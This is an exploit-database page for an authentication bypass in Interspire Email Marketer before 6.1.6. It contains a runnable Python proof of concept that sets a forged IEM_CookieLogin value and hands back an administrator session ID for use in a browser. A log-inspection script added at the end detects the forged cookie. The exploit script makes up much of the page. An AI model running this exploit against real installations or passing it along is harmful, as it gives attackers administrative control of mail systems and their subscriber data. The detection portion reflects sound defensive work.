zdt Devcoin 1337DAY-ID-30224
History: Apr 22, 2018 - 12:00 a.m.

Interspire Email Marketer - Remote Admin Authentication Bypass Exploit

2018-04-22 00:00:00
devcoin
0day.today

EPSS: 0.208 Low
Percentile: 96.4%

The function in init.php that checks whether the user is already logged in, in Interspire Email Marketer (IEM) prior to 6.1.6, allows remote attackers to bypass authentication and obtain administrative access by using the IEM_CookieLogin cookie with a specially crafted value. On top of that, if the customer doesn't have an annual maintenance plan, the application says that it is on the last available version and that there is no update.
The vulnerabilities were found during an incident response on a compromised instance of the application.
Proof of Concept:
Details provided here: https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html

#### Usage Info
python magic_cookie.py url

import requests
import sys


def cookie_cutter(url):
    # Stays None if the server never issues an IEMSESSIONID cookie.
    session_rider = None
    with requests.Session() as s:
        s.get(url)
        r = s.get(url)
        # Baseline response body, compared with the second response below.
        response_regex = r.text
        print("requesting initial Cookie\n")
        print(str(r.headers) + "\n")

        for key, value in s.cookies.items():
            if "IEMSESSIONID" in key:
                print("Key:" + key + ",Value:" + value)
                print("-" * 25)
                print("forging Admin cookie" + "\n")
                print("-" * 25)
                # Attach the crafted IEM_CookieLogin value to the session.
                s.cookies.set('IEM_CookieLogin', "YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D")
        for key, value in s.cookies.items():
            print("Key:" + key + ",Value:" + value)
            print("-" * 25)
            if "IEMSESSIONID" in key:
                session_rider = value
        print("Making 2nd request with Forged Cookie\n")
        print("-" * 25)
        r = s.get(url)
        response_regex2 = r.text

        # A changed response body means the server treated the session differently.
        if response_regex != response_regex2:
            print("Response Headers" + "\n")
            print("-" * 25)
            print(str(r.headers) + "\n")
            print("-" * 25)
            print("Response Status Code" + "\n")
            print(str(r.status_code) + "\n")
            print("-" * 25)
            print(response_regex2 + "\n")
            print("-" * 25)
    return session_rider


def main():
    url = sys.argv[1]
    print(url)
    session_rider_value = cookie_cutter(url)
    if session_rider_value is None:
        # No IEMSESSIONID cookie was returned, so there is nothing to report.
        print("No IEMSESSIONID cookie received")
        return
    print("Magic Cookie Generated Modify Existing IEMSESSIONID Value In browser With Below Value ")
    print("-" * 25)
    print(session_rider_value + "\n")
    print("-" * 25)


if __name__ == "__main__":
    main()


#  0day.today [2018-04-23]  #
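
For the detection side, an added example that is not part of the original advisory or PoC: it decodes an IEM_CookieLogin value as it would appear in web server or proxy logs and flags a `rand` field that is not a string, which is what the value hard-coded in the PoC decodes to. The parser, the function names and the benign sample cookie are constructed for this example, and it is an assumption that a legitimate cookie carries `rand` as a string token.

```python
import base64
import re
from urllib.parse import unquote

# Value hard-coded in the PoC on this page.
POC_COOKIE = ("YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7"
              "czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D")
# Constructed benign sample; the rand token is made up (assumed to be a string).
BENIGN_COOKIE = base64.b64encode(
    b'a:4:{s:4:"user";s:1:"1";s:4:"time";i:1505477294;'
    b's:4:"rand";s:13:"59bb8c2e1a2b3";s:8:"takemeto";s:9:"index.php";}').decode()

_SCALAR = re.compile(rb's:(\d+):"|i:(-?\d+);|b:([01]);')


def parse_flat_php_array(raw):
    """Parse a flat PHP-serialized array holding only string/int/bool scalars."""
    head = re.match(rb"a:(\d+):\{", raw)
    if not head:
        raise ValueError("not a serialized array")
    pos, items = head.end(), []
    while len(items) < 2 * int(head.group(1)):
        tok = _SCALAR.match(raw, pos)
        if not tok:
            raise ValueError("unsupported or malformed value at offset %d" % pos)
        pos = tok.end()
        if tok.group(1) is not None:  # s:<len>:"<bytes>";
            end = pos + int(tok.group(1))
            if raw[end:end + 2] != b'";':
                raise ValueError("string length mismatch at offset %d" % pos)
            items.append(raw[pos:end].decode("utf-8", "replace"))
            pos = end + 2
        elif tok.group(2) is not None:  # i:<int>;
            items.append(int(tok.group(2)))
        else:  # b:0; or b:1;
            items.append(tok.group(3) == b"1")
    if raw[pos:] != b"}":
        raise ValueError("trailing data after array")
    return dict(zip(items[0::2], items[1::2]))


def inspect_cookie(value):
    """Return findings for one logged IEM_CookieLogin value ([] = nothing flagged)."""
    try:
        fields = parse_flat_php_array(base64.b64decode(unquote(value), validate=True))
    except ValueError:  # also covers binascii.Error from bad base64
        return ["undecodable or unexpected structure"]
    rand = fields.get("rand")
    if not isinstance(rand, str):
        return ["rand is %s, expected a string token" % type(rand).__name__]
    return []
```

Run `inspect_cookie` over every IEM_CookieLogin value extracted from request logs; any non-empty result on an instance older than 6.1.6 is worth correlating with admin activity from the same client.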
